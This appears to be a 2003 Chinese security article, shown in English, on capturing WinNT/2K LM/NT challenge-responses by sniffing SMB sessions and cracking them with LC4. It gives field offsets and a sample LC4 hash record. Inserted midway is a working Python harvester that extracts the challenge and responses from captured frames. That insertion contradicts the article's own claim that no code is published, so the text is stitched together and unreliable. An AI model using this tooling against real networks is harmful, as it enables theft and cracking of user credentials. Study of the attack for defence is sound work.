Source: Xiaobai (xiaobai)    Updated: 2003-4-27 6:51:18    Reads: 35

Non-mainstream intrusion: session hijacking of WinNT/2K hashes


Statement:
This article only analyses, at the technical level, how WinNT/2K hashes can be captured from an SMB session with a sniffer. The author accepts no responsibility for any harm this article might cause.

Introduction:
Recently SMB session hijacking has occupied many threads on the big technical forums and attracted a lot of attention; the NSFOCUS (绿盟) monthly, issue 37, Phrack issue 60 and the XFocus (安全焦点) summit have also published related articles, which has turned SMB session hijacking into a hot topic. Because it stems from a design flaw in Windows rather than an implementation bug, it is a particularly frightening method of attack. This article tries to show, from the angle of SMB packet analysis, how WinNT/2K hashes are intercepted. The concrete implementation is not published here, and the reader is asked to keep the statement above firmly in mind.

Notes:
To keep the article focused, neither the SMB protocol nor the SMB session flow is discussed here; readers who are interested should consult the reference documents in the appendix. Unless otherwise stated, every packet mentioned in the article was captured with Sniffer Pro, and for ease of analysis the physical frame, IP and TCP headers have been stripped, leaving only the NetBIOS (NETB) and SMB portions.
Main text:
Assume two machines: a client A and an SMB server B.
First, session establishment:
When A tries to access a particular resource on B, a NetBIOS session is set up first. A sends a Session Request that carries the encoded NetBIOS names. B listens for connections on port 139; after receiving A's request, B sends back a Session Confirm (positive session response) with no payload. At this point a valid session exists. The NETB Type of the Session Request packet is 0x81 and that of the Session Confirm is 0x82; a program can check these two markers to decide whether a valid session has been produced, and then go on to capture the SMB packets.
Second, obtaining the challenge:
Once the session is established, the connection moves on to authentication, and from this step we can obtain the challenge that B generates at random and sends to A.
The process is as follows: A sends B a Negotiate Protocol request, and B sends A a random 8-byte challenge, carried in the Negotiate Protocol Response (the "Server Response" packet) that B returns to A. Capture this packet with Sniffer Pro, strip the physical frame, IP and TCP headers, then strip the 4-byte NETB header; what remains is the SMB message. Strip the 33-byte SMB response header (the 32-byte SMB header plus the WordCount byte), move a further 36 bytes (the 34 bytes of parameter words plus the 2-byte ByteCount), and the next 8 bytes are the challenge. That is the randomly generated server challenge we need.
(Because the goal of this article is the implementation of the interception, the concrete meaning of the bytes in the packets is not explained; only their positions are given, and the rest of the article follows the same principle. Readers who want to understand them thoroughly should refer to the reference documents in the appendix.)
Third, obtaining the LM and NT hashes:
After A has received the challenge that B sent back for encrypting the password, A sends B a request to establish a null session, B returns its Server Response, and the IPC$ null session is established. A then sends the LM and NT hashes to B in a Session Setup AndX request, asking for access to the specific resource, and waits for B's permission. What we need to do is capture this SMB packet sent by A. To extract the hashes, again strip the physical frame, IP and TCP headers, then the 4-byte NETB header, leaving the SMB message; strip the 33-byte SMB header (32 bytes plus WordCount), move a further 28 bytes (the 26 bytes of parameter words plus the 2-byte ByteCount), and the next 24 bytes are the LM hash, immediately followed by 24 bytes of NT hash. We now hold the LM hash and NT hash of host A. Strictly speaking, these 24-byte values are not the hashes stored on A but the LM and NT responses A computed from those hashes and the challenge; that is exactly the pair that LC4, given the challenge, brute-forces in the next step.
Fourth, cracking the hashes
We now have the challenge, the LM hash and the NT hash. Write them into a file in the LC format and import it into LC4 for brute-force cracking. The LC file format is as follows:
192.168.0.244 ADMINIST-7Z6A4E\Administrator:"":"":89E5E3F54A998398DC36E89DDD37334C801201CA39C9A5D3:8457623684F27A5EFA5FE7B647E87C36D78616F80594123C:E3A96FF4507B9EDF
The last three hex fields are, in order, the LM hash, the NT hash and the challenge.
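The four steps above, as an added example that is not the article's code: a small Python parser that strips the NETB header, waits for the 0x81/0x82 session exchange, pulls the 8-byte challenge out of the Negotiate Protocol response (33 + 36 bytes in, as in step two), pulls the two responses out of the Session Setup AndX request (33 + 28 bytes in, as in step three, but reading their lengths from the parameter words instead of assuming 24), and writes the LC line of step four. The frames it runs on are constructed inline to follow those layouts (the hex values are reused from the LC record above); the dialect index, buffer sizes and OS strings in the builders are placeholder values, and the parser assumes the client sends Unicode strings, as WinNT/2K clients do.

```python
"""Pull the server's challenge and the client's LM/NT responses out of captured
NetBIOS/SMB frames and emit them in the LC file format.  Added example, not the
article's code: the frames are constructed by hand to follow the NT LM 0.12
layouts the article describes and stand in for real Sniffer Pro output."""
import struct

NBT_SESSION_MESSAGE, NBT_SESSION_REQUEST, NBT_POSITIVE_RESPONSE = 0x00, 0x81, 0x82
SMB_MAGIC, SMB_HEADER_LEN = b"\xffSMB", 32
SMB_COM_NEGOTIATE, SMB_COM_SESSION_SETUP_ANDX = 0x72, 0x73
SMB_FLAGS_REPLY, SMB_FLAGS2_UNICODE = 0x80, 0x8000

def split_netbios(frame):
    """Drop the 4-byte NetBIOS session header (RFC 1002): (type, payload)."""
    return frame[0], frame[4:4 + (int.from_bytes(frame[1:4], "big") & 0x1FFFF)]

def smb_fields(smb):
    """(command, is_reply, flags2, word_count) from the 32-byte SMB header."""
    if smb[:4] != SMB_MAGIC:
        raise ValueError("not an SMB message")
    return smb[4], bool(smb[9] & SMB_FLAGS_REPLY), struct.unpack_from("<H", smb, 10)[0], smb[SMB_HEADER_LEN]

def challenge_from_negotiate_reply(smb):
    """Negotiate Protocol response: header + WordCount (33), 17 words + ByteCount (36), challenge."""
    command, is_reply, _, word_count = smb_fields(smb)
    if command != SMB_COM_NEGOTIATE or not is_reply:
        raise ValueError("not a Negotiate Protocol response")
    params_off = SMB_HEADER_LEN + 1
    challenge_len = smb[params_off + 2 * word_count - 1]  # EncryptionKeyLength, last parameter byte
    data_off = params_off + 2 * word_count + 2
    return smb[data_off:data_off + challenge_len]

def _ucs2_cstring(buf, pos):
    """NUL-terminated UTF-16LE string at pos (Win2K clients send Unicode): (text, next pos)."""
    end = pos
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[pos:end].decode("utf-16-le"), end + 2

def responses_from_session_setup(smb):
    """Session Setup AndX request: header + WordCount (33), 13 words + ByteCount (28),
    then the LM and NT responses, lengths taken from the parameter words."""
    command, is_reply, flags2, word_count = smb_fields(smb)
    if command != SMB_COM_SESSION_SETUP_ANDX or is_reply:
        raise ValueError("not a Session Setup AndX request")
    params_off = SMB_HEADER_LEN + 1
    lm_len, nt_len = struct.unpack_from("<HH", smb, params_off + 14)
    pos = params_off + 2 * word_count + 2
    lm_resp, nt_resp = smb[pos:pos + lm_len], smb[pos + lm_len:pos + lm_len + nt_len]
    pos += lm_len + nt_len
    if flags2 & SMB_FLAGS2_UNICODE:
        pos += pos % 2  # Unicode strings are 2-byte aligned from the start of the SMB header
    user, pos = _ucs2_cstring(smb, pos)
    domain, _ = _ucs2_cstring(smb, pos)
    return domain, user, lm_resp, nt_resp

def lc_record(client_ip, domain, user, lm_resp, nt_resp, challenge):
    """One line in the LC file format the article shows, everything as upper-case hex."""
    return '%s %s\\%s:"":"":%s:%s:%s' % (client_ip, domain, user, lm_resp.hex().upper(),
                                          nt_resp.hex().upper(), challenge.hex().upper())

def harvest(frames, client_ip):
    """After 0x81/0x82, pair the server's challenge with the client's responses; LC line or None."""
    session_up, challenge = False, None
    for frame in frames:
        nbt_type, payload = split_netbios(frame)
        if nbt_type == NBT_SESSION_REQUEST:
            session_up, challenge = False, None
        elif nbt_type == NBT_POSITIVE_RESPONSE:
            session_up = True
        elif nbt_type == NBT_SESSION_MESSAGE and session_up:
            command, is_reply, _, _ = smb_fields(payload)
            if command == SMB_COM_NEGOTIATE and is_reply:
                challenge = challenge_from_negotiate_reply(payload)
            elif command == SMB_COM_SESSION_SETUP_ANDX and not is_reply and challenge:
                return lc_record(client_ip, *responses_from_session_setup(payload), challenge)
    return None

# Constructed sample capture; the builders double as a record of the field layouts.
def _nbt(nbt_type, payload):
    return bytes([nbt_type]) + len(payload).to_bytes(3, "big") + payload

def _smb_header(command, reply):
    return (SMB_MAGIC + bytes([command]) + b"\x00" * 4 + bytes([SMB_FLAGS_REPLY if reply else 0])
            + struct.pack("<H", SMB_FLAGS2_UNICODE) + b"\x00" * 20)

def build_negotiate_reply(challenge):  # dialect index, buffer sizes etc. are placeholder values
    params = struct.pack("<HBHHIIIIQhB", 0, 3, 50, 1, 16644, 65536, 0, 0x80000001, 0, 480, len(challenge))
    data = challenge + "WORKGROUP\0".encode("utf-16-le")
    return _smb_header(SMB_COM_NEGOTIATE, True) + bytes([17]) + params + struct.pack("<H", len(data)) + data

def build_session_setup_request(domain, user, lm_resp, nt_resp):
    params = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 16644, 50, 0, 0, len(lm_resp), len(nt_resp), 0, 0x80000000)
    data = lm_resp + nt_resp
    data += b"\x00" * ((SMB_HEADER_LEN + 1 + len(params) + 2 + len(data)) % 2)  # alignment pad
    for s in (user, domain, "Windows 2000 2195", "Windows 2000 5.0"):
        data += (s + "\0").encode("utf-16-le")
    return _smb_header(SMB_COM_SESSION_SETUP_ANDX, False) + bytes([13]) + params + struct.pack("<H", len(data)) + data

SAMPLE_CHALLENGE = bytes.fromhex("E3A96FF4507B9EDF")
SAMPLE_LM = bytes.fromhex("89E5E3F54A998398DC36E89DDD37334C801201CA39C9A5D3")
SAMPLE_NT = bytes.fromhex("8457623684F27A5EFA5FE7B647E87C36D78616F80594123C")
SAMPLE_FRAMES = [
    _nbt(NBT_SESSION_REQUEST, (b"\x20" + b"C" * 32 + b"\x00") * 2),  # called + calling names, not parsed
    _nbt(NBT_POSITIVE_RESPONSE, b""),
    _nbt(NBT_SESSION_MESSAGE, build_negotiate_reply(SAMPLE_CHALLENGE)),
    _nbt(NBT_SESSION_MESSAGE, build_session_setup_request("ADMINIST-7Z6A4E", "Administrator", SAMPLE_LM, SAMPLE_NT)),
]
```

harvest(SAMPLE_FRAMES, "192.168.0.244") reproduces the LC record shown above. Reading the two lengths from the parameter words instead of hard-coding 24 matters in practice: an NTLMv2 client puts a much longer blob in the NT field, and a client that answers with an empty LM field would otherwise have its NT response misread as LM.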
Fifth, summary
This article set out to discuss how SMB session hijacking is realised under WinNT/2K; for related questions please consult the reference documents. Because the intrusion method is complex and requires a certain foundation, not many people have mastered it. I have written it as simply as I could; following the steps above is enough to reproduce it. The concrete code is not given here; interested readers can study it for themselves.

Reference documents:
1. SMB/CIFS BY THE ROOT, author: ledin; translated and reorganised by TOo2y
2. SMB series (5): the LM/NTLM authentication mechanism, author: Xiaosi (小四)
3. Applying the SMB/CIFS protocol, author: Ilsy
